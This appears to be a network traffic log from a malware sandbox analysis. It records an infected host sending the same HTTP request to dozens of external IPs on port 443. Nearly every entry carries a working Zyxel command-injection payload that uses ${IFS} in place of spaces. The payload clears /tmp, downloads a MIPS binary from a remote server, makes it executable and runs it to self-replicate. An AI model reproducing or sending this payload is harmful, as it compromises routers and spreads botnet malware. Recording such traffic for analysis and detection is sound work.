                        1161192.168.2.145380076.216.166.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073342085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1162192.168.2.1442468170.15.129.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073365927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1163192.168.2.143532043.145.59.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073398113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1164192.168.2.1445170137.244.109.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073442936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1165192.168.2.144869897.157.44.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073498964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1166192.168.2.1455730213.37.157.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073527098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1167192.168.2.143642238.170.183.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073564053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1168192.168.2.143429261.254.9.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073612928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1169192.168.2.1458608149.152.183.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073673964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1170192.168.2.1442580162.163.225.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073718071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1171192.168.2.1440956125.62.163.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073767900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1172192.168.2.145525054.216.138.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073798895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1173192.168.2.1458062221.36.145.66443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073842049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1174192.168.2.14577965.165.41.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073890924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1175192.168.2.1453626177.119.166.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073939085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1176192.168.2.1458066113.169.50.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074007988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1177192.168.2.143541447.46.207.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074059010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1178192.168.2.1449850166.239.199.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074115038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1179192.168.2.1455978144.26.167.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074157953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1180192.168.2.144868495.121.201.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074191093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1181192.168.2.1449118145.215.229.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074258089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1182192.168.2.1441066190.28.3.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074299097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1183192.168.2.1449340145.138.112.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074342966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1184192.168.2.1453964188.90.142.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074383974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1185192.168.2.144654476.88.128.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074417114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1186192.168.2.145989452.152.219.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074444056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1187192.168.2.1433530167.25.161.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074495077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1188192.168.2.1452674158.22.41.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074547052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1189192.168.2.144850027.85.113.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074583054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1190192.168.2.143407491.150.43.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074614048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1191192.168.2.145216457.195.230.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074650049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1192192.168.2.145124664.201.28.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074704885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1193192.168.2.1452438118.98.76.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074754953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1194192.168.2.1449770150.157.13.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074784040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1195192.168.2.1451592101.146.239.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074850082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1196192.168.2.1454356183.136.220.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074886084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1197192.168.2.1455594178.141.26.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074922085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1198192.168.2.1457068121.145.97.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.074959040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1199192.168.2.1445540200.164.230.146443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075027943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1200192.168.2.1449474173.25.236.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075078011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1201192.168.2.1437216141.130.122.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075139999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1202192.168.2.1448010132.143.110.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075169086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1203192.168.2.1456482210.0.39.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075212955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1204192.168.2.1457790222.105.56.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075258970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1205192.168.2.1444580115.39.67.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075315952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1206192.168.2.1449194201.196.189.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075349092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1207192.168.2.1454994201.177.0.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075393915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1208192.168.2.1446790165.33.197.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075439930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1209192.168.2.144958824.168.152.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075463057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1210192.168.2.1435252161.165.76.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075485945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1211192.168.2.143578250.207.119.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075541973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1212192.168.2.1441378112.186.95.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075578928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1213192.168.2.1436142115.212.49.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075624943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1214192.168.2.1443408196.3.40.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075647116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1215192.168.2.1445360181.52.12.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075701952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1216192.168.2.144564623.218.56.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075743914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1217192.168.2.1453350120.255.228.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075804949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1218192.168.2.144789092.222.216.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075831890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1219192.168.2.1442778166.59.157.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075897932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1220192.168.2.145684617.162.108.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075942993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1221192.168.2.1446776119.235.22.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.075994968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1222192.168.2.1452524213.178.198.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076036930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1223192.168.2.1455080153.154.170.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076081991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1224192.168.2.14336864.24.198.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076148033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1225192.168.2.143398696.124.129.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076186895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1226192.168.2.1447228163.84.132.72443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076212883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1227192.168.2.1439902223.197.201.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076275110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1228192.168.2.1459842185.102.3.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076311111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1229192.168.2.1448330219.164.23.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.076364040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1230192.168.2.1438150177.78.23.233443
                        TimestampBytes transferredDirectionData
